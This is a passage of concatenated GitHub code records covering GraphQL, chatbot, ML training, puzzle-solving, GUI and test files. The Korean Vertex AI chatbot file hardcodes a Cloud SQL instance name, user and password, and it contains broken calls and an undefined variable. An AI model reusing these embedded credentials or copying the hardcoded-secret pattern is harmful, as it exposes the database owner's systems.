requests\n self.execution_context.result = GraphQLExecutionResult(\n data=None,\n errors=[GraphQLError('Too many requests, wait a minute.')],\n )\n\n\nSCHEMA = strawberry.Schema(\n query=Query,\n mutation=Mutation,\n extensions=[RateLimiter],\n config=StrawberryConfig(auto_camel_case=False),\n)\n","repo_name":"nipreps/migas-server","sub_path":"migas/server/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"9146749733","text":"import vertexai\nfrom transformers import AutoModel, AutoTokenizer\nfrom vertexai.preview.language_models import ChatModel, InputOutputTextPair, ChatMessage\nfrom db_connect import db_connect\n\n# PROJECT_ID = \"esoteric-stream-399606\"\n# LOCATION = \"us-central1\"\ninstance_connection_name = \"esoteric-stream-399606:asia-northeast3:wjdfoek3\"\ndb_user = \"postgres\"\ndb_pass = \"pgvectorwjdfo\"\ndb_name = \"pgvector\"\nvdb = db_connect(instance_connection_name, db_user, db_pass, db_name)\n\nclass first_chatbot:\n def __init__(self, proj_id, loc):\n vertexai.init(project = proj_id, location = loc)\n\n @staticmethod\n def get_KoSimCSE():\n model = AutoModel.from_pretrained('BM-K/KoSimCSE-roberta-multitask')\n tokenizer = AutoTokenizer.from_pretrained('BM-K/KoSimCSE-roberta-multitask')\n\n return model, tokenizer\n\n def separate(self, question):\n model, tokenizer = get_KoSimCSE()\n query_text = input(\"Q >> \")\n\n chat_model = ChatModel.from_pretrained(\"chat-bison@001\") #chat model 불러오기\n\n chat = chat_model.start_chat(\n context=\"수업에 대해 궁금해하는 학생들이 과목, 교수에 대해 질문하는 서비스야. 강의평과 관련된 질문이면 질문 내용에 질문을 출력해주고 아니면 그냥 NULL을 출력해줘\",\n examples=[\n InputOutputTextPair(\n input_text=\"정기숙 교수님 자료구조응용 수업 어때?에서 과목명, 교수명, 질문 내용이 뭐야?\",\n output_text=\"과목명 자료구조응용 교수명 정기숙 질문 내용 수업이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"정기숙 교수님 어때?에서 과목명, 교수명, 질문내용이 뭐야?\",\n output_text=\"과목명 NULL 교수명 정기숙 질문 내용 교수님이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"자료구조응용 수업 어때?에서 과목명, 교수명, 질문내용이 뭐야?\",\n output_text=\"과목명 자료구조응용 교수명 NULL 질문 내용 수업이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"과제 어떻고 수업 어때?에서 과목명, 교수명, 질문 내용이 뭐야?\",\n output_text=\"질문 내용 과제가 어떻고 수업이 어떤지 물어보는 내용\",\n ),\n InputOutputTextPair(\n input_text=\"강의평과 관련 없는 질문\",\n output_text=\"NULL\",\n ),\n ],\n temperature=0.0,\n max_output_tokens=1024,\n top_p=0.8,\n top_k=1\n )\n\n #LLM에게 질문해서 user의 input으로부터 과목, 교수명 가져오기\n key_query = chat.send_message(question+\"에서 과목명, 교수명, 질문 내용이 뭐야?\").text\n\n if key_query == \"NULL\" :\n print(\"강의평과 관련된 내용을 입력하세요.\")\n return\n\n lec, prof, query = extract(key_query)\n inputs = tokenizer(query, padding=True, truncation=True, return_tensors=\"pt\")\n\n embeddings, _ = model(**inputs, return_dict=False)\n embedding_arr = embeddings[0][0].detach().numpy()\n embedding_str = \",\".join(str(x) for x in embedding_arr)\n embedding_str = \"[\"+embedding_str+\"]\"\n\n return lec, prof, embedding_str\n\n @staticmethod\n def extract(q): #LLM의 output으로부터 prof name, lecture name 추출\n lec = q.find(\"과목명\")\n prof = q.find(\"교수명\")\n q_start = q.find(\"질문 내용\")\n\n lecture = q[lec+4:prof-1]\n professor = q[prof+4:]\n query = q[q_start+6:]\n if lecture == \"NULL\" : lecture = None\n if professor == \"NULL\" : professor = None\n return lecture, professor, query\n\n def chat(self, query_text, history):\n chat_model = ChatModel.from_pretrained(\"chat-bison@001\")\n\n output_chat = chat_model.start_chat(\n context=\"강의를 찾는 대학생들에게 강의평들을 토대로 수업이 어떤지 알려주는 서비스야, 주어진 강의평들을 요약해서 학생들에게 알려줘\" + articles + \"강의평을 가져올 때는 있는 그대로 가져오지 말고 나름대로 요약해서 알려주고 공손하게 알려줘\",\n message_history = history,\n temperature=0.3,\n max_output_tokens=1024,\n top_p=0.8,\n top_k=10\n )\n\n output = output_chat.send_message(query_text).text\n\n history.append(ChatMessage(content = query_text, author = \"user\"))\n history.append(ChatMessage(content = output, author = \"bot\"))\n\n","repo_name":"Hollyys/Chatbot","sub_path":"LLM.py","file_name":"LLM.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30439746100","text":"import torch\nimport numpy as np\nfrom torch import nn\nfrom tqdm import tqdm\n\nfrom core.base_trainer import BaseTrainer\nfrom engine import validate_watermark\n\n\nclass Trainer(BaseTrainer):\n def __init__(self, args, device, model, optimizer, train_loader):\n super().__init__(args.epochs, model, optimizer, train_loader, device)\n self.args = args\n self.num_class = args.output_channel\n self.batch_size = args.batch_size\n self.half_batch_size = int(self.batch_size / 2)\n self.trigger_label = args.target * torch.ones([self.batch_size], dtype=torch.long).to(device)\n self.w_label = torch.zeros([self.batch_size]).to(device)\n self.w_label[:self.half_batch_size] = 1\n self.temperatures = torch.tensor(args.temperatures, dtype=torch.float).to(device)\n\n def fgsm_optimize_trigger(self, trigger, target_data, w_num_batch):\n batch_size = self.args.batch_size\n device = self.device\n half_batch_size = int(batch_size / 2)\n height = target_data[0].shape[0]\n width = target_data[0].shape[1]\n if self.args.distribution == \"in\":\n trigger_grad = []\n for batch in range(w_num_batch):\n batch_data = np.concatenate([trigger[batch * half_batch_size: (batch + 1) * half_batch_size],\n target_data[batch * half_batch_size: (batch + 1) * half_batch_size]], 0)\n batch_data = torch.from_numpy(batch_data).to(device, dtype=torch.float)\n snnl = self.model.snnl_trigger(batch_data, self.w_label, self.temperatures)\n grad = torch.autograd.grad(snnl, batch_data, grad_outputs=torch.ones_like(snnl))[0][:half_batch_size]\n trigger_grad.append(grad)\n avg_grad = np.average(np.concatenate(trigger_grad), 0)\n down_sample = np.array(\n [[np.sum(avg_grad[i: i + 3, j: j + 3]) for i in range(height - 2)] for j in range(width - 2)])\n w_pos = np.unravel_index(down_sample.argmin(), down_sample.shape)\n trigger[:, w_pos[0]:w_pos[0] + 3, w_pos[1]:w_pos[1] + 3, 0] = 1\n else:\n w_pos = [-1, -1]\n\n step_list = np.zeros([w_num_batch])\n for batch in range(w_num_batch):\n current_trigger = trigger[batch * half_batch_size: (batch + 1) * half_batch_size]\n for epoch in range(self.args.maxiter):\n while validate_watermark(self.model, current_trigger, self.args.target, batch_size,\n self.num_class) > self.args.threshold and step_list[batch] < 50:\n step_list[batch] += 1\n inputs = np.concatenate([current_trigger, current_trigger], 0)\n inputs = torch.from_numpy(inputs).to(device, dtype=torch.float).requires_grad_()\n output = self.model(inputs, True)[-1]\n prediction = torch.unbind(output, dim=1)[self.args.target]\n gradient = torch.autograd.grad(prediction, inputs,\n grad_outputs=torch.ones_like(prediction))[0]\n # current_trigger = np.clip(current_trigger - w_lr * np.sign(grad[:half_batch_size]), 0, 1)\n current_trigger = np.clip(\n current_trigger - self.args.w_lr * np.sign(gradient[:half_batch_size].cpu().numpy()), 0, 1)\n\n batch_data = np.concatenate([current_trigger,\n target_data[batch * half_batch_size: (batch + 1) * half_batch_size]], 0)\n batch_data = torch.from_numpy(batch_data).to(device, dtype=torch.float).requires_grad_()\n predictions = self.model.snnl_trigger(batch_data, self.w_label)\n gradient = torch.autograd.grad(predictions, batch_data,\n grad_outputs=[torch.ones_like(pred) for pred in predictions])[0]\n current_trigger = np.clip(\n current_trigger + self.args.w_lr * np.sign(gradient[:half_batch_size].cpu().numpy()),\n 0, 1)\n\n for i in range(5):\n inputs = np.concatenate([current_trigger, current_trigger], 0)\n inputs = torch.from_numpy(inputs).to(device, dtype=torch.float).requires_grad_()\n output = self.model(inputs, True)[-1]\n prediction = torch.unbind(output, dim=1)[self.args.target]\n gradient = torch.autograd.grad(prediction, inputs,\n grad_outputs=torch.ones_like(prediction))[0]\n current_trigger = np.clip(\n current_trigger - self.args.w_lr * np.sign(gradient[:half_batch_size].cpu().numpy()),\n 0, 1)\n trigger[batch * half_batch_size: (batch + 1) * half_batch_size] = current_trigger\n\n def watermark_model(self, num_batch, w_num_batch, trigger, target_data):\n n_w_ratio = self.args.ratio\n iterator = iter(self.train_loader)\n criterion = nn.CrossEntropyLoss()\n j = 0\n for _ in tqdm(range(round(self.args.w_epochs * num_batch / w_num_batch))):\n for batch in range(w_num_batch):\n if n_w_ratio >= 1:\n for i in range(int(n_w_ratio)):\n if j >= num_batch:\n j = 0\n self.step_once(iterator, criterion)\n j += 1\n if n_w_ratio > 0 and n_w_ratio % 1 != 0 and n_w_ratio * batch >= j:\n if j >= num_batch:\n j = 0\n self.step_once(iterator, criterion)\n j += 1\n batch_data = np.concatenate([trigger[batch * self.half_batch_size: (batch + 1) * self.half_batch_size],\n target_data[\n batch * self.half_batch_size: (batch + 1) * self.half_batch_size]], 0)\n batch_data = torch.from_numpy(batch_data).to(self.device, dtype=torch.float).requires_grad_()\n pred = self.model(batch_data, True)[-1]\n self.temperatures = self.temperatures.requires_grad_()\n snnl = self.model.snnl_trigger(batch_data, self.w_label, self.temperatures)\n grad = \\\n torch.autograd.grad(snnl, self.temperatures, grad_outputs=[torch.ones_like(s) for s in snnl])[\n 0]\n loss = criterion(pred, self.trigger_label)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.temperatures.data -= self.args.t_lr * grad\n\n def step_once(self, iterator, criterion):\n try:\n batch, target = next(iterator)\n except StopIteration:\n iterator = iter(self.train_loader)\n batch, target = next(iterator)\n batch = batch.to(self.device)\n target = target.to(self.device)\n pred = self.model(batch)[-1]\n loss = criterion(pred, target)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n","repo_name":"RorschachChen/entangled-watermark-torch","sub_path":"core/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"12844942985","text":"import time \nimport numpy as np\n\n\nproblem_number = 82\ntest_solution = 994\n\n\n#read data\n\n\nnumber_file = open(\"data.txt\", \"r\")\nraw_data = number_file.read()\nnumber_file.close()\n\ntest = raw_data.split('\\n')\nmatrix_value = []\n\nfor row in test:\n matrix_value.append(row.split(','))\n\nfor i in range(len(matrix_value)):\n for j in range(len(matrix_value)):\n matrix_value[i][j] = int(matrix_value[i][j])\n\n\n#Solution\n\n\ndef solution(matrix_input):\n size = len(matrix_input)\n \n min_matrix = [[0 for j in range(size)] for i in range(size)] \n \n for i in range(size):\n min_matrix[i][0] = matrix_input[i][0]\n \n for j in range(1, size):\n for i in range(size):\n \n min_value = np.infty\n \n for previous_index in range(size):\n \n value = min_matrix[previous_index][j - 1]\n \n if previous_index == i:\n value += matrix_input[i][j]\n elif previous_index < i:\n for index in range(previous_index, i + 1):\n value += matrix_input[index][j]\n else:\n for index in range(i, previous_index + 1):\n value += matrix_input[index][j]\n \n if value < min_value:\n min_value = value\n \n min_matrix[i][j] = min_value\n \n result = np.infty\n for i in range(size):\n if result > min_matrix[i][size - 1]:\n result = min_matrix[i][size - 1]\n \n return result\n\n\n#Test & Result\n\n\nfichier = open(\"Solution \"+str(problem_number)+\".txt\", \"w\")\nstring = \"\"\n\nbegin_test = time.time()\ntest_value = solution([[131, 673, 234, 103, 18], [201, 96, 342, 965, 150], [630, 803, 746, 422, 111], [537, 699, 497, 121, 956], [805, 732, 524, 37, 331]])\nend_test = time.time()\ntest_time = end_test - begin_test\n\nstring += \"TEST #1\\n\\n\"\nstring += \"Output: \"+str(test_value)+\"\\n\"\nstring += \"Answer: \"+str(test_solution)+\"\\n\"\nstring += \"Computation time: \"+str(test_time)+\" sec\\n\"\nstring += \"Verification: \"\n\nif(test_value == test_solution):\n string += \"TRUE\"\nelse:\n string += \"FALSE\"\n \n\nbegin_problem = time.time()\nproblem_value = solution(matrix_value)\nend_problem = time.time()\nproblem_time = end_problem - begin_problem\n\nstring += \"\\n\\n\\nRESULT PROBLEM #\"+str(problem_number)+\"\\n\\n\"\nstring += \"Output: \"+str(problem_value)+\"\\n\"\nstring += \"Computation time: \"+str(problem_time)+\" sec\\n\"\n\nstring += \"\\n\\n\\nCurrent date & time: \" + time.strftime(\"%c\")\n\nfichier.write(string)\nfichier.close()\n","repo_name":"FrancoisdeFouchecour/Projet-Euler","sub_path":"Problems/82-Problem/Problem 82.py","file_name":"Problem 82.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70676996712","text":"from random import randint, random\n\nMUTATION_RATE = 0.2\n\n'''Clase que representa una solución al problema de N reinas en un tablero de NxN.\nLa solución se representa simplemente con las posiciones de las N reinas.\n'''\nclass NQueenIndividual:\n def __init__(self, n):\n '''Crea un intento de solución para el problema de N reinas en un tablero NxN\n '''\n self.n = n\n self.queens = []\n for _ in range(n):\n while True:\n new_queen = [randint(0, n - 1), randint(0, n - 1)]\n if new_queen not in self.queens:\n self.queens.append(new_queen)\n break\n\n\n def reproduce(self, another_nqueens):\n '''Crea una nueva solución, a partir de las dos soluciones padres\n '''\n child = NQueenIndividual(self.n)\n\n division = randint(0, self.n)\n child.queens = self.queens[:division]\n\n for new_queen in another_nqueens.queens[division:]:\n if new_queen in child.queens:\n while True:\n new_queen = [randint(0, self.n - 1), randint(0, self.n - 1)]\n if new_queen not in child.queens:\n break\n child.queens.append(new_queen)\n\n for i in range(self.n):\n # Si se muta, poner una reina completamente nueva\n if random() < MUTATION_RATE:\n while True:\n new_queen = [randint(0, self.n - 1), randint(0, self.n - 1)]\n if new_queen not in child.queens:\n child.queens[i] = new_queen\n break\n\n return child\n","repo_name":"danno-s/genetic-algorithm","sub_path":"src/nqueen_individual.py","file_name":"nqueen_individual.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15205221439","text":"#!/usr/bin/env python\n\nimport sys\n\nline = sys.stdin.readline()\nline = line.rstrip()\n\ncases = int(line)\n\nfor case in xrange(0, cases):\n K = int(sys.stdin.readline().strip())\n ds = map(int, sys.stdin.readline().rstrip().split())\n ds[0:1] = []\n\n indexes = range(0,K)\n cards = [-1]*K\n\n I = 0\n for X in xrange(0,K):\n I+=X\n I = I%(len(indexes))\n ii = I%(K-X)\n i = indexes[ii]\n indexes[ii:ii+1] = []\n cards[i] = X\n\n sys.stdout.write(\"Case #%d:\" % (case+1))\n for d in ds:\n sys.stdout.write(\" %d\" % (cards[d-1]+1))\n sys.stdout.write(\"\\n\")\n\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/08/23/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"39224411662","text":"import streamlit as st\r\nimport joblib\r\n\r\nmodel = joblib.load('./model.pkl')\r\nvectorizer = joblib.load('./vectorizer.pkl')\r\n\r\ndef predict_review(review_text):\r\n review_text = [review_text]\r\n review_text = vectorizer.transform(review_text).toarray()\r\n prediction = model.predict(review_text)\r\n return prediction[0]\r\n\r\ndef app():\r\n st.title('Review Sentiment Analysis App')\r\n\r\n review = st.text_input('Enter your review:')\r\n if st.button('Submit'):\r\n prediction = predict_review(review)\r\n if prediction == 1:\r\n st.write('This app is not fraudulent.')\r\n st.balloons();\r\n else:\r\n st.write('This app is fraudulent.')\r\n\r\n positive_proba = model.predict_proba(vectorizer.transform([review]))[0][1]\r\n negative_proba = model.predict_proba(vectorizer.transform([review]))[0][0]\r\n st.write(f\"Positive sentiment probability: {round(positive_proba*100)}%\")\r\n st.write(f\"Negative sentiment probability: {round(negative_proba*100)}%\")\r\n # st.slider(\"Sentiment Percentage\", 0, 100, (positive_proba*100))\r\n\r\n\r\nif __name__ == '__main__':\r\n app()\r\n","repo_name":"Gatecoders/FraudAppProject","sub_path":"webApp.py","file_name":"webApp.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3348885222","text":"class Solution:\n def minPathSum(self, mat: List[List[int]]) -> int:\n if len(mat) == 1:\n return sum(mat[0])\n for i in range(len(mat)-1):\n for j in range(len(mat[i])-1):\n if j == 0:\n mat[i+1][0] += mat[i][0]\n if i == 0:\n mat[0][j+1] += mat[0][j]\n\n for i in range(1, len(mat)):\n for j in range(1, len(mat[i])):\n mat[i][j] = mat[i][j] + min(mat[i-1][j], mat[i][j-1])\n\n return mat[-1][-1]\n","repo_name":"sasankyadavalli/leetcode","sub_path":"minPathSum_64.py","file_name":"minPathSum_64.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70164996394","text":"# source: https://www.rosettacode.org/wiki/Averages/Mean_time_of_day#Python\n\nfrom cmath import rect, phase\nfrom math import radians, degrees\n\nclass Utils:\n @staticmethod\n def meanAngle(deg):\n return degrees(phase(sum(rect(1, radians(d)) for d in deg)/len(deg)))\n\n @staticmethod\n def meanTime(times):\n t = (time.split(':') for time in times)\n seconds = ((float(s) + int(m) * 60 + int(h) * 3600)\n for h, m, s in t)\n day = 24 * 60 * 60\n to_angles = [s * 360. / day for s in seconds]\n mean_as_angle = Utils.meanAngle(to_angles)\n mean_seconds = mean_as_angle * day / 360.\n if mean_seconds < 0:\n mean_seconds += day\n h, m = divmod(mean_seconds, 3600)\n m, s = divmod(m, 60)\n return '%02i:%02i:%02i' % (h, m, s)\n","repo_name":"zameerbharwani/UW_CS_Host_Tracker","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"994279707","text":"import os\nimport glob\nimport unittest\nimport pytorch_lightning as pl\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\nfrom pathlib import Path\nfrom utils import tools, callbacks, supported_preprocessing_transforms\nfrom modules.vae_base_module import VAEBaseModule\nfrom datasets import supported_datamodules\nfrom models import supported_models\n\n\nclass TestVAETraining(unittest.TestCase):\n\n def test_vae_config_compatability(self):\n\n # TODO: Replace with glob once all models and configurations are operational (see test_cae_training.py)\n config_paths = [\n 'configs/vae/vae_simple_mnist.yaml',\n 'configs/vae/vae_simple_curiosity.yaml',\n 'configs/vae/vae_baseline_curiosity.yaml'\n ]\n for pth in config_paths:\n logging.info(f\"Testing training for: {pth}\")\n config = tools.load_config(pth)\n\n module = _test_training_pipeline(config)\n\n log_path = Path('tests') / \\\n 'test_logs' / \\\n config['experiment-parameters']['datamodule'] / \\\n config['experiment-parameters']['model'] / \\\n f'version_{module.version}'\n logging.info(log_path)\n\n self.assertTrue( (log_path / 'checkpoints').is_dir() )\n self.assertTrue( (log_path / 'configuration.yaml').is_file() )\n self.assertTrue( (log_path / 'model_summary.txt').is_file() )\n\n\ndef _test_training_pipeline(config):\n \"\"\"This pipeline shadows the pipeline in trainers/train_vae.py with modifications for testing\"\"\"\n # Change log_dir for testing\n config['experiment-parameters']['log_dir'] = os.path.join('tests', 'test_logs')\n\n # Set up preprocessing routine\n preprocessing_transforms = supported_preprocessing_transforms[config['data-parameters']['preprocessing']]\n\n datamodule = supported_datamodules[config['experiment-parameters']['datamodule']](\n data_transforms=preprocessing_transforms,\n **config['data-parameters'])\n datamodule.prepare_data()\n datamodule.setup('train')\n\n model = supported_models[config['experiment-parameters']['model']](\n datamodule.data_shape, **config['module-parameters'])\n\n # Initialize experimental module\n module = VAEBaseModule(\n model,\n train_size=datamodule.train_size,\n val_size=datamodule.val_size,\n batch_size=datamodule.batch_size,\n **config['module-parameters'])\n\n # Initialize loggers to monitor training and validation\n logger = pl.loggers.TensorBoardLogger(\n config['experiment-parameters']['log_dir'], # Temp location for dummy logs\n name=os.path.join(config['experiment-parameters']['datamodule'], config['experiment-parameters']['model']))\n\n # Initialize the Trainer object\n trainer = pl.Trainer(\n gpus=1,\n logger=logger,\n max_epochs=1,\n weights_summary=None,\n callbacks=[\n pl.callbacks.EarlyStopping(\n monitor='val_elbo_loss',\n patience=5 if config['experiment-parameters']['patience'] is None else config['experiment-parameters']['patience']),\n pl.callbacks.ModelCheckpoint(\n monitor='val_elbo_loss',\n filename='{val_elbo_loss:.2f}-{epoch}',\n save_last=True),\n pl.callbacks.GPUStatsMonitor(),\n callbacks.VAEVisualization()\n ])\n\n # Find learning rate\n lr, lr_finder_fig = callbacks.learning_rate_finder(trainer, module, datamodule, num_training=25)\n module.lr = lr\n config['module-parameters']['learning_rate'] = module.lr\n\n # Train the model\n trainer.fit(module, datamodule)\n\n # Remove try-except block for testing\n tools.save_object_to_version(\n config, version=module.version, filename='configuration.yaml', **config['experiment-parameters'])\n tools.save_object_to_version(\n str(model), version=module.version, filename='model_summary.txt', **config['experiment-parameters'])\n\n return module\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"brahste/novelty-detection","sub_path":"tests/test_vae_training.py","file_name":"test_vae_training.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12058045175","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'Prim'\n\n__author__ = 'lxp'\n\n#《大话数据结构》247页,基于邻接矩阵的最小生成树Prim算法\n\nimport adjacencyMatrix\n\ndef miniSpanTree_Prim(G):\n\tlowcost = []\n\tadjvex = []\n\tfor i in range(G.numVertexes):\n\t\tlowcost.append(G.arc[0][i])\n\t\tadjvex.append(0)\n\tfor i in range(1, G.numVertexes):\n\t\tmin_ = float('inf')\n\t\tj = 1\n\t\tk = 0\n\t\twhile j < G.numVertexes:\n\t\t\tif lowcost[j] != 0 and lowcost[j] < min_:\n\t\t\t\tmin_ = lowcost[j]\n\t\t\t\tk = j\n\t\t\tj = j + 1\n\t\tprint(\"本次循环选择边的下标为: \", adjvex[k], k)\n\t\tfor j in range(1, G.numVertexes):\n\t\t\tif G.arc[k][j] < lowcost[j]:\n\t\t\t\tlowcost[j] = G.arc[k][j]\n\t\t\t\tadjvex[j] = k\n\n\treturn\n\n\n#test\ndef test():\n\tsample = adjacencyMatrix.MGraph()\n\tsample.createMGraph()\n\tsample.showMGraph()\n\tminiSpanTree_Prim(sample)\n\treturn\n\nif __name__ == '__main__':\n\ttest()","repo_name":"LiuXPeng/pythonDataStructure","sub_path":"Prim.py","file_name":"Prim.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25901420106","text":"from customtkinter import *\r\nfrom helper import * \r\n\r\n\r\nmode= \"dark\"\r\nset_appearance_mode(mode)\r\nset_default_color_theme(\"dark-blue\")\r\n\r\n\r\ndef ldMode():\r\n set_appearance_mode(\"light\")\r\ndef dMode():\r\n set_appearance_mode(\"dark\")\r\n\r\ndef get():\r\n ent= txt.get()\r\n # name=txt3.get()\r\n # bir=txt2.get()\r\n entry.delete(0, END)\r\n entry1.delete(0, END)\r\n entry2.delete(0, END)\r\n newWindow= CTkToplevel(root)\r\n newWindow.title(\"Student Record\")\r\n newWindow.geometry(\"500x600\")\r\n frame= CTkFrame(master=newWindow)\r\n frame.pack(pady=20, padx= 60 , fill='both', expand= True)\r\n l1= CTkLabel(frame, text=\"Student Information\", font= (\"san sarif\", 20, \"bold\"))\r\n l1.pack(pady=10,padx=10)\r\n S1.fetch_all(ent)\r\n if len(ent)== 0:\r\n le2= CTkLabel(frame, text=\"All field are required\", font= (\"san sarif\", 20, \"bold\"))\r\n le2.pack(pady=10,padx=10)\r\n if len(ent) >10:\r\n le1= CTkLabel(frame, text=\"No Student Found\", font= (\"san sarif\", 20, \"bold\"))\r\n le1.pack(pady=10,padx=10)\r\n else:\r\n lA=CTkLabel(frame, text=\"Name:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lA.pack(padx=100)\r\n lA1= CTkLabel(frame, text=rec[1])\r\n lA1.pack(padx=10)\r\n\r\n lB=CTkLabel(frame, text=\"Enrollment No:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lB.pack(padx=100)\r\n lB2= CTkLabel(frame, text=rec[2])\r\n lB2.pack(padx=10)\r\n\r\n lC=CTkLabel(frame, text=\"Date of Birth:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lC.pack(padx=100)\r\n lC2= CTkLabel(frame, text=rec[3])\r\n lC2.pack(padx=10)\r\n\r\n lD=CTkLabel(frame, text=\"Father's Name:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lD.pack(padx=100)\r\n lD2= CTkLabel(frame, text=rec[4])\r\n lD2.pack(padx=10)\r\n\r\n lE=CTkLabel(frame, text=\"Course:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lE.pack(padx=100)\r\n lE2= CTkLabel(frame, text=rec[5])\r\n lE2.pack(padx=10)\r\n\r\n lF=CTkLabel(frame, text=\"Fee Status:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lF.pack(padx=100)\r\n lF2= CTkLabel(frame, text=rec[6])\r\n lF2.pack(padx=10)\r\n\r\n lG=CTkLabel(frame, text=\"Gender:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lG.pack(padx=100)\r\n lG2= CTkLabel(frame, text=rec[7])\r\n lG2.pack(padx=10)\r\n\r\n lH=CTkLabel(frame, text=\"Semester:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lH.pack(padx=100)\r\n lH2= CTkLabel(frame, text=rec[8])\r\n lH2.pack(padx=10)\r\n\r\n lI=CTkLabel(frame, text=\"G-mail:\" ,font= (\"san sarif\", 15 ,\"bold\"))\r\n lI.pack(padx=100)\r\n lI2= CTkLabel(frame, text=rec[9])\r\n lI2.pack(padx=10)\r\n\r\n\r\n\r\n \r\n\r\n\r\nroot = CTk()\r\nroot.title(\"Student Record Portal\")\r\nroot.geometry(\"500x500\")\r\nframe= CTkFrame(master=root )\r\nframe.pack(pady=20, padx= 60 , fill='both', expand= True)\r\nlabel1= CTkLabel(master=frame, text=\"School of Electronic , Davv\" , font= (\"san sarif\", 20, \"bold\") )\r\nlabel1.pack( pady=12, padx=10)\r\n\r\n\r\n\r\n \r\nlabel= CTkLabel(master=frame, text=\"Enter student details\", )\r\nlabel.pack(pady=12, padx=10)\r\n\r\ntxt3=StringVar()\r\nlabel2= CTkLabel(master=frame, text=\"Name\", )\r\nlabel2.pack( padx=10)\r\nentry= CTkEntry(master=frame ,width= 200,textvariable=txt3)\r\nentry.pack( padx=10)\r\nname=entry.get()\r\n\r\n\r\ntxt= StringVar()\r\nlabel4= CTkLabel(master=frame, text=\"Enrollment No.\", )\r\nlabel4.pack( padx=10)\r\nentry1= CTkEntry(master=frame, width= 200, textvariable=txt)\r\nentry1.pack( padx=10, )\r\nent=entry1.get()\r\n\r\ntxt2=StringVar()\r\nlabel3= CTkLabel(master=frame, text=\"Birth Date\", )\r\nlabel3.pack( padx=10)\r\nentry2= CTkEntry(master=frame, width= 200,textvariable=txt2)\r\nentry2.pack( padx=10)\r\nbir=entry2.get()\r\n\r\nb1= CTkButton(master=frame, text= \"search\", command=get )\r\nb1.pack(pady=30, padx=10)\r\nbtn= CTkRadioButton(master=frame, text=\"light mode\", command=ldMode )\r\nbtn.pack(pady=8)\r\nbtn1= CTkRadioButton(master=frame, text=\"dark mode\", command=dMode)\r\nbtn1.pack(pady=8)\r\nroot.mainloop()\r\n\r\n\r\n\r\n","repo_name":"Suyash1855/StudentRecordPortal","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14821156869","text":"# Owner(s): [\"oncall: distributed\"]\n\nimport contextlib\nimport functools\nimport itertools\nimport sys\nfrom typing import Any, Callable, Dict, List, Optional\nfrom unittest import mock\n\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nfrom torch.distributed.fsdp import CPUOffload, MixedPrecision\nfrom torch.distributed.fsdp._flat_param import FlatParamHandle\nfrom torch.distributed.fsdp.fully_sharded_data_parallel import (\n BackwardPrefetch,\n FullyShardedDataParallel as FSDP,\n ShardingStrategy,\n)\nfrom torch.distributed.fsdp.wrap import ModuleWrapPolicy\nfrom torch.distributed.utils import _p_assert\nfrom torch.testing._internal.common_distributed import skip_if_lt_x_gpu\nfrom torch.testing._internal.common_fsdp import (\n AlwaysWrapNestedWrappedModule,\n CUDAInitMode,\n DummyDDP,\n FSDPInitMode,\n FSDPTest,\n MixtureOfExperts,\n NestedWrappedModule,\n NestedWrappedModuleWithDelay,\n subtest_name,\n TransformerWithSharedParams,\n)\nfrom torch.testing._internal.common_utils import (\n instantiate_parametrized_tests,\n parametrize,\n run_tests,\n TEST_WITH_DEV_DBG_ASAN,\n)\n\nif not dist.is_available():\n print(\"Distributed not available, skipping tests\", file=sys.stderr)\n sys.exit(0)\n\nif TEST_WITH_DEV_DBG_ASAN:\n print(\n \"Skip dev-asan as torch + multiprocessing spawn have known issues\",\n file=sys.stderr,\n )\n sys.exit(0)\n\nparams = 